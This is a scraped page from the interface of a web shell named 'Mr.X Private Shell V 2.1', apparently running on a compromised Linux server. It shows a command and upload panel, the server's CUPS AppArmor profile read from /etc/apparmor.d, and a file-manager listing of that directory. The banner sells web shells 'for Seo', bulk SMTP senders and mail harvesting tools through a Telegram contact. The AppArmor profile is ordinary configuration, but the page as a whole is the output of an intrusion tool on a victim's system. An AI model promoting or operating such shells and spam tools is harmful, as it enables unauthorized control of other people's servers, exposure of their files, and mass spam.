__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        

            For_More_Tools:
            
                Telegram: @jackleet | Bulk Smtp support mail sender  | Business Mail Collector  |  Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private

Upload:

Command:

[email protected]: ~ $ 
# vim:syntax=apparmor
# Last Modified: Thu Aug  2 12:54:46 2007
# Author: Martin Pitt <[email protected]>

#include <tunables/global>

/usr/sbin/cupsd flags=(attach_disconnected) {
  #include <abstractions/base>
  #include <abstractions/bash>
  #include <abstractions/authentication>
  #include <abstractions/dbus>
  #include <abstractions/fonts>
  #include <abstractions/nameservice>
  #include <abstractions/perl>
  #include <abstractions/user-tmp>

  capability chown,
  capability fowner,
  capability fsetid,
  capability kill,
  capability net_bind_service,
  capability setgid,
  capability setuid,
  capability audit_write,
  capability wake_alarm,
  deny capability block_suspend,

  # noisy
  deny signal (send) set=("term") peer=unconfined,

  # nasty, but we limit file access pretty tightly, and cups chowns a
  # lot of files to 'lp' which it cannot read/write afterwards any
  # more
  capability dac_override,
  capability dac_read_search,

  # the bluetooth backend needs this
  network bluetooth,

  # the dnssd backend uses those
  network x25 seqpacket,
  network ax25 dgram,
  network netrom seqpacket,
  network rose dgram,
  network ipx dgram,
  network appletalk dgram,
  network econet dgram,
  network ash dgram,

  # To allow cupsd to determine which interfaces a snapped client
  # is plugging
  /{,var/}run/snapd.socket rw,

  # CUPS is of systemd service type "notify" now, meaning that cupsd notifies
  # systemd when it is up and running, give CUPS access to systemd's
  # notification socket
  /run/systemd/notify w,

  /{usr/,}bin/bash ixr,
  /{usr/,}bin/dash ixr,
  /{usr/,}bin/hostname ixr,
  /dev/lp* rw,
  deny /dev/tty rw,  # silence noise
  /dev/ttyS* rw,
  /dev/ttyUSB* rw,
  /dev/usb/lp* rw,
  /dev/bus/usb/ r,
  /dev/bus/usb/** rw,
  /dev/parport* rw,
  /etc/cups/ rw,
  /etc/cups/** rw,
  /etc/cups/interfaces/* ixrw,
  /etc/foomatic/* r,
  /etc/gai.conf r,
  /etc/papersize r,
  /etc/pnm2ppa.conf r,
  /etc/printcap rwl,
  /etc/ssl/** r,
  /etc/letsencrypt/archive/** r,
  @{PROC}/net/ r,
  @{PROC}/net/* r,
  @{PROC}/sys/dev/parport/** r,
  @{PROC}/*/net/ r,
  @{PROC}/*/net/** r,
  @{PROC}/*/auxv r,
  @{PROC}/sys/crypto/** r,
  /sys/** r,
  /usr/bin/* ixr,
  /usr/sbin/* ixr,
  /{usr/,}bin/* ixr,
  /{usr/,}sbin/* ixr,
  /usr/lib/** rm,

  # backends which come with CUPS can be confined
  /usr/lib/cups/backend/bluetooth ixr,
  /usr/lib/cups/backend/dnssd ixr,
  /usr/lib/cups/backend/http ixr,
  /usr/lib/cups/backend/ipp ixr,
  /usr/lib/cups/backend/lpd ixr,
  /usr/lib/cups/backend/mdns ixr,
  /usr/lib/cups/backend/parallel ixr,
  /usr/lib/cups/backend/serial ixr,
  /usr/lib/cups/backend/snmp ixr,
  /usr/lib/cups/backend/socket ixr,
  /usr/lib/cups/backend/usb ixr,

  # we treat cups-pdf specially, since it needs to write into /home
  # and thus needs extra paranoia
  /usr/lib/cups/backend/cups-pdf Px,

  # allow communicating with cups-pdf via Unix sockets
  unix peer=(label=/usr/lib/cups/backend/cups-pdf),

  # third party backends get no restrictions as they often need high
  # privileges and this is beyond our control
  /usr/lib/cups/backend/* Cx -> third_party,

  /usr/lib/cups/cgi-bin/* ixr,
  /usr/lib/cups/daemon/* ixr,
  /usr/lib/cups/monitor/* ixr,
  /usr/lib/cups/notifier/* ixr,
  # filters and drivers (PPD generators) are always run as non-root,
  # and there are a lot of third-party drivers which we cannot predict
  /usr/lib/cups/filter/** Cxr -> third_party,
  /usr/lib/cups/driver/* Cxr -> third_party,
  /usr/local/** rm,
  /usr/local/lib/cups/** rix,
  /usr/share/** r,
  /{,var/}run/** rm,
  /{,var/}run/avahi-daemon/socket rw,
  deny /{,var/}run/samba/ rw,
  /{,var/}run/samba/** rw,
  /var/cache/samba/*.tdb r,
  /var/{cache,lib}/samba/printing/printers.tdb r,
  /{,var/}run/cups/ rw,
  /{,var/}run/cups/** rw,
  /var/cache/cups/ rw,
  /var/cache/cups/** rwk,
  /var/log/cups/ rw,
  /var/log/cups/* rw,
  /var/spool/cups/ rw,
  /var/spool/cups/** rw,

  # third-party printer drivers; no known structure here
  /opt/** rix,

  # FIXME: no policy ATM for hplip and Brother drivers
  /usr/bin/hpijs Cx -> third_party,
  /usr/Brother/** Cx -> third_party,

  # Kerberos authentication
  /etc/krb5.conf r,
  deny /etc/krb5.conf w,
  /etc/krb5.keytab rk,
  /etc/cups/krb5.keytab rwk,
  /tmp/krb5cc* k,

  # likewise authentication
  /etc/likewise r,
  /etc/likewise/* r,

  # silence noise
  deny /etc/udev/udev.conf r,

  signal peer=/usr/sbin/cupsd//third_party,
  unix peer=(label=/usr/sbin/cupsd//third_party),
  profile third_party flags=(attach_disconnected) {
    # third party backends, filters, and drivers get relatively no restrictions
    # as they often need high privileges, are unpredictable or otherwise beyond
    # our control
    file,
    capability,
    audit deny capability mac_admin,
    network,
    dbus,
    signal,
    ptrace,
    unix,
  }

  # Site-specific additions and overrides. See local/README for details.
  #include if exists <local/usr.sbin.cupsd>
}

# separate profile since this needs to write into /home
/usr/lib/cups/backend/cups-pdf {
  #include <abstractions/base>
  #include <abstractions/fonts>
  #include <abstractions/nameservice>
  #include <abstractions/user-tmp>

  capability chown,
  capability fowner,
  capability fsetid,
  capability setgid,
  capability setuid,

  # unfortunate, but required for when $HOME is 700
  capability dac_override,
  capability dac_read_search,

  # allow communicating with cupsd via Unix sockets
  unix peer=(label=/usr/sbin/cupsd),

  @{PROC}/*/auxv r,

  /{usr/,}bin/dash ixr,
  /{usr/,}bin/bash ixr,
  /{usr/,}bin/cp ixr,
  /etc/papersize r,
  /etc/cups/cups-pdf.conf r,
  /etc/cups/ppd/*.ppd r,
  /usr/bin/gs ixr,
  /usr/lib/cups/backend/cups-pdf mr,
  /usr/lib/ghostscript/** mr,
  /usr/share/** r,
  /var/log/cups/cups-pdf*_log w,
  /var/spool/cups/** r,
  /var/spool/cups-pdf/** rw,

  # allow read and write on almost anything in @{HOME} (lenient, but
  # private-files-strict is in effect), to support customized "Out"
  # setting in cups-pdf.conf (Debian#940578)
  #include <abstractions/private-files-strict>
  @{HOME}/[^.]*/{,**/} rw,
  @{HOME}/[^.]*/**     rw,

  # Site-specific additions and overrides.
  #include if exists <local/usr.lib.cups.backend.cups-pdf>
}

Filemanager

DIR : / etc/ apparmor.d/
Name Type Size Permission Actions
abi Folder 0755
abstractions Folder 0755
disable Folder 0755
force-complain Folder 0755
local Folder 0755
rsyslog.d Folder 0755
tunables Folder 0755
1password File 354 B 0644
Discord File 352 B 0644
MongoDB_Compass File 386 B 0644
QtWebEngineProcess File 404 B 0644
Xorg File 3.58 KB 0644
alsamixer File 1.22 KB 0644
babeld File 706 B 0644
balena-etcher File 374 B 0644
bfdd File 766 B 0644
bgpd File 818 B 0644
brave File 348 B 0644
buildah File 342 B 0644
bwrap-userns-restrict File 2.96 KB 0644
cam File 330 B 0644
ch-checkns File 351 B 0644
ch-run File 339 B 0644
chrome File 349 B 0644
chromium File 408 B 0644
code File 349 B 0644
crun File 333 B 0644
desktop-icons-ng File 427 B 0644
devhelp File 342 B 0644
dnstracer File 1000 B 0644
eigrpd File 700 B 0644
element-desktop File 368 B 0644
epiphany File 356 B 0644
evolution File 348 B 0644
fabricd File 680 B 0644
firefox File 410 B 0644
flatpak File 342 B 0644
foliate File 342 B 0644
fusermount3 File 1.66 KB 0644
geary File 336 B 0644
github-desktop File 378 B 0644
goldendict File 353 B 0644
iotop-c File 446 B 0644
ipa_verify File 351 B 0644
irssi File 1.19 KB 0644
isisd File 789 B 0644
kchmviewer File 353 B 0644
keybase File 346 B 0644
lc-compliance File 360 B 0644
ldpd File 757 B 0644
libcamerify File 354 B 0644
linux-boot-prober File 1.34 KB 0644
linux-sandbox File 383 B 0644
loupe File 336 B 0644
lsb_release File 1.35 KB 0644
lsblk File 1.09 KB 0644
lsusb File 1.09 KB 0644
lxc-attach File 351 B 0644
lxc-create File 351 B 0644
lxc-destroy File 354 B 0644
lxc-execute File 354 B 0644
lxc-stop File 345 B 0644
lxc-unshare File 354 B 0644
lxc-usernsexec File 363 B 0644
mbsync File 1.2 KB 0644
mmdebstrap File 351 B 0644
mosquitto File 1.59 KB 0644
msedge File 352 B 0644
nc.openbsd File 803 B 0644
nhrpd File 792 B 0644
notepadqq File 402 B 0644
nvidia_modprobe File 1.18 KB 0644
obsidian File 350 B 0644
opam File 333 B 0644
openvpn File 3.88 KB 0644
opera File 355 B 0644
os-prober File 1.71 KB 0644
ospf6d File 869 B 0644
ospfd File 1.09 KB 0644
pageedit File 347 B 0644
pathd File 674 B 0644
pbrd File 671 B 0644
pim6d File 721 B 0644
pimd File 718 B 0644
plasmashell File 1005 B 0644
podman File 339 B 0644
polypane File 350 B 0644
privacybrowser File 365 B 0644
qcam File 333 B 0644
qmapshack File 348 B 0644
qutebrowser File 354 B 0644
remmina File 2.9 KB 0644
ripd File 705 B 0644
ripngd File 677 B 0644
rootlesskit File 354 B 0644
rpm File 330 B 0644
rssguard File 347 B 0644
runc File 340 B 0644
rygel File 3.99 KB 0644
sbuild File 427 B 0644
sbuild-abort File 445 B 0644
sbuild-adduser File 452 B 0644
sbuild-apt File 439 B 0644
sbuild-checkpackages File 469 B 0644
sbuild-clean File 445 B 0644
sbuild-createchroot File 466 B 0644
sbuild-destroychroot File 470 B 0644
sbuild-distupgrade File 463 B 0644
sbuild-hold File 442 B 0644
sbuild-shell File 445 B 0644
sbuild-unhold File 448 B 0644
sbuild-update File 448 B 0644
sbuild-upgrade File 451 B 0644
scide File 355 B 0644
signal-desktop File 366 B 0644
slack File 342 B 0644
slirp4netns File 517 B 0644
staticd File 788 B 0644
steam File 363 B 0644
stress-ng File 348 B 0644
surfshark File 354 B 0644
systemd-coredump File 377 B 0644
thunderbird File 354 B 0644
tinyproxy File 1.86 KB 0644
tnftp File 2.54 KB 0644
toybox File 339 B 0644
transmission File 2.38 KB 0644
trinity File 342 B 0644
tshark File 1.7 KB 0644
tup File 330 B 0644
tuxedo-control-center File 400 B 0644
ubuntu_pro_apt_news File 1.8 KB 0644
ubuntu_pro_esm_cache File 6.71 KB 0644
unix-chkpwd File 881 B 0644
unprivileged_userns File 699 B 0644
userbindmount File 360 B 0644
usr.bin.man File 3.37 KB 0644
usr.bin.papers File 11.2 KB 0644
usr.bin.tcpdump File 1.65 KB 0644
usr.bin.wsdd File 1.15 KB 0644
usr.lib.libreoffice.program.oosplash File 1.48 KB 0644
usr.lib.libreoffice.program.senddoc File 1.2 KB 0644
usr.lib.libreoffice.program.soffice.bin File 10.49 KB 0644
usr.lib.libreoffice.program.xpdfimport File 1.02 KB 0644
usr.lib.snapd.snap-confine.real File 31.04 KB 0644
usr.sbin.cups-browsed File 767 B 0644
usr.sbin.cupsd File 6.11 KB 0644
usr.sbin.mysqld File 1.96 KB 0644
usr.sbin.rsyslogd File 1.69 KB 0644
usr.sbin.sssd File 1.47 KB 0644
uwsgi-core File 351 B 0644
vdens File 336 B 0644
virtiofsd File 352 B 0644
vivaldi-bin File 358 B 0644
vpnns File 336 B 0644
vrrpd File 674 B 0644
wg File 968 B 0644
wg-quick File 2.93 KB 0644
wike File 333 B 0644
wpcom File 346 B 0644
znc File 1.14 KB 0644

Copyright reserved © 2026 xtooler.online Shell Coded By Mr.X

Filemanager